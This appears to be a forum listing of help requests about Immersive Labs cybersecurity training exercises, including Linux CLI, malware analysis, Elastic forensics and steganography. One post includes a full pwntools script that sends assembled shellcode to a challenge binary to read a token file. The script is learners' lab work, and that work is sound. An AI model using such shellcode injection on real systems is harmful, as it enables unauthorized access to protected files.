Web Log Analysis: Ep.5 – Searching Web Server Logs using Linux CLI
Looking for some tips to help me get past step 1 (!) of this lab. I have tried to cs into Log-Files/ but nothing is returned, and the same for a cat command. I don't have experience with Linux but want to attempt this lab - maybe even some lab recommendations on how to get to a sufficient level with Linux would help? Thanks!!
Need Help for Pwntools: Ep. 6 — Demonstrate Your Skills
I'm trying to solve an lab in Immersive labs Pwntools: Ep. 6 — Demonstrate Your Skills And I got stuck in the last step. I've tried the solution for using cat2 (from https://www.reddit.com/r/immersivelabs/comments/1ap3tub/pwntools_ep_6_demonstrate_your_skills/) but it is still not working. Could you please help me with this if possible shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0) is what I tried from pwn import * import struct # Start the challenge binary p = process("/opt/demonstrate-challenge") # Use the correct path # === Part 1: Solve Arithmetic Challenge === p.recvuntil(b"What is the sum of ") numbers = p.recvline().decode().strip().split(" and ") num1 = int(numbers[0]) num2 = int(numbers[1].split("?")[0]) print(f"[+] Solving: {num1} + {num2} = {num1 + num2}") p.sendline(str(num1 + num2)) # === Part 2: Solve Packing Challenge === p.recvuntil(b"Send me back the following two 32-bit unsigned integers packed in little-endian order:\n") values = p.recvline().decode().strip().split(" and ") val1 = int(values[0]) val2 =int(values[1]) print(f"[+] Packing values: {val1} and {val2}") payload = struct.pack("<II", val1, val2) p.send(payload) # === Part 3: Leak Address of parsing_check() === elf = ELF("/opt/demonstrate-challenge") # Load the ELF binary parsing_check_addr = elf.symbols['parsing_check'] # Get function address print(f"[+] Found parsing_check() address: {hex(parsing_check_addr)}") p.sendline(str(parsing_check_addr)) # === Part 4: Send Shellcode to Read /home/token-user/token.txt === file_path = '/home/token-user/token.txt' shellcode = shellcraft.cat2(file_path, 1, 40) # Pwntools shellcode shellcode += shellcraft.ret() # Ensure proper return assembled_shellcode = asm(shellcode) p.send(assembled_shellcode) # === Get Flag Output === response = p.recvall() print(response)
Practical Malware Analysis: Static Analysis question 18
for finding the exact name of the executable file. After dynamically overriding the function as shown in the briefing I cant seem to find any meaningful creation of the filename matching the patter provided in sprintf. I am wondering if I should be overriding a different function? as I cant seem to find any meaningful leads when searching for references or traveling to the next data. I also cant seem to find any leads from searching specifically for local_104 and unaff_EDI references as well.Need help: Endace: Ep.3 – Elastic Integration Scenario
I stumbled upon this lab after my holidays and I was able to solve all questions except: So far I was able to follow the path from the first user, over to the second user and the service installement, priv. escalation, base64 decodings, pwd changes on domain controllers, etc. Problem 1: I can't find any named pipe for Q15. Not in the Elastic (and I'm checking there all datasources) nor in the wireshark dump/endance gui. Problem 2: But when I download files via "Extract File" in the Send Option I don't get any files (even when I take the whole timeline (~1h). I can download the logs and see some stuff in there but not one single file will help me to answer the Q16. So, does anyone has an idea where to look at? (or is the lab development not yet finished?) -steven
Historic Steganography Lab
I've been stuck on question 6 in the Stenography lab within the Historic Encryption upskill series. I'm not sure if I'm missing something within the command line or if the password/passphrase for the file is wrong. The password/passphrase is supposed to be "carnivale" Here are some screenshots to help zero in where I'm at. Thanks all!Help again Linux CLI: Ep.16 – Combining Commands
I feel like I'm banging my head against the wall with the last 2 questions of this lab. I've been stuck on question 5 for the grep command. Any hints of what am I doing wrong? missing? And then the last question to run sleep. Huh? Is there a command to combine with the sleep 600? Any help would be appreciated. So I can finally do the last lab for Linux. =)
